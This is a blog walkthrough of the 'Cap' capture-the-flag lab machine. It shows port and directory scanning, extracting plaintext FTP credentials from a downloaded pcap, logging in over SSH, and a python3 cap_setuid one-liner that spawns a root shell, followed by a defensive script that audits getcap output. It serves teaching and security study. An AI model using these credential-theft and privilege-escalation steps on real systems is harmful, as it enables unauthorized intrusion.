
Cap

  • Admin
  • Jan 7, 2022
  • 1 min read

Updated: Jul 10, 2023


Enumeration



nmap -sV 10.129.228.42



Port 80 is open. Let's check it by entering the IP address in our browser.



gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42

Now let's open our browser again and check:

10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat

10.129.228.42/data seems interesting. I tried several combinations and found something interesting with 10.129.228.42/data/0.


If you type 10.129.228.42/data/0 in your browser, you are offered a file to download.


Download the file. It is called 0.pcap.


Looks like a pcap file, so let's open Wireshark and look more into it.


On the Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> wireshark



Once Wireshark loads, click on File --> Open


Locate your 0.pcap file and click on Open.



In the filter field, type ftp to show only FTP traffic. FTP sends credentials unencrypted, so we can see the password used by Nathan in plaintext!


Foothold


We know that SSH is open too, so let's try that:

ssh nathan@10.129.228.42

You are prompted to enter a password. Enter the password we just found.


The credentials worked and we are in.


ls

cat user.txt

You got your flag!



Privilege Escalation


id

getcap -r / 2>/dev/null

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now we are root!
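
The os.setuid(0) call above can only succeed for a non-root user when the python3 binary carries the cap_setuid file capability, which is the kind of grant the getcap scan reveals. As an added example (not part of the original walkthrough), the Python script below audits getcap -r output for such grants so they can be removed; the sample lines and the DANGEROUS and INTERPRETERS lists are constructed for illustration.

```python
import re

# Capabilities that let a process change identity or bypass file permissions.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin",
             "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}
# Programs that run arbitrary user code: whoever can execute them can use
# every capability the file grants. (Illustrative list, not exhaustive.)
INTERPRETERS = re.compile(r"^(python|perl|ruby|php|node|lua|bash|sh)[\d.]*$")

# One capability clause, e.g. "cap_setuid,cap_net_bind_service+eip" or "=ep".
CLAUSE = r"[a-z0-9_,]*[=+-][eip]*"
# getcap prints "path = clauses" (older libcap) or "path clauses" (newer).
LINE = re.compile(rf"^(?P<path>.+?)(?: =)? (?P<caps>{CLAUSE}(?: {CLAUSE})*)$")

def granted_caps(cap_text):
    """Capability names raised in the permitted or effective set."""
    granted = set()
    for clause in cap_text.split():
        names, op, flags = re.fullmatch(
            r"([a-z0-9_,]*)([=+-])([eip]*)", clause).groups()
        # Inheritable-only ("+i") grants nothing by itself, so skip it.
        if op == "-" or not set(flags) & {"e", "p"}:
            continue
        # An empty name list (as in "=ep") means every capability.
        granted.update(names.split(",") if names else ["all"])
    return granted

def audit(getcap_output):
    """Return (severity, path, capabilities) for each risky grant."""
    findings = []
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        risky = granted_caps(m["caps"]) & (DANGEROUS | {"all"}) if m else set()
        if risky:
            name = m["path"].rsplit("/", 1)[-1]
            severity = "critical" if INTERPRETERS.match(name) else "review"
            findings.append((severity, m["path"], sorted(risky)))
    return findings

# Constructed sample of `getcap -r / 2>/dev/null` output, mixing both layouts.
SAMPLE = """\
/usr/bin/python3 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping cap_net_raw=ep
/opt/tools/backup cap_dac_read_search=ep
/usr/bin/perl cap_setuid+i
"""

if __name__ == "__main__":
    for severity, path, caps in audit(SAMPLE):
        print(f"[{severity}] {path}: {','.join(caps)} -> setcap -r {path}")
```

On a real host, pass the captured output of getcap -r / 2>/dev/null to audit(); setcap -r <path> removes the capabilities from a flagged file.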


id


ls


cd /root

ls

cat root.txt

Now we have the root flag too!


Congratulations!






©2025 by My Tech On IT
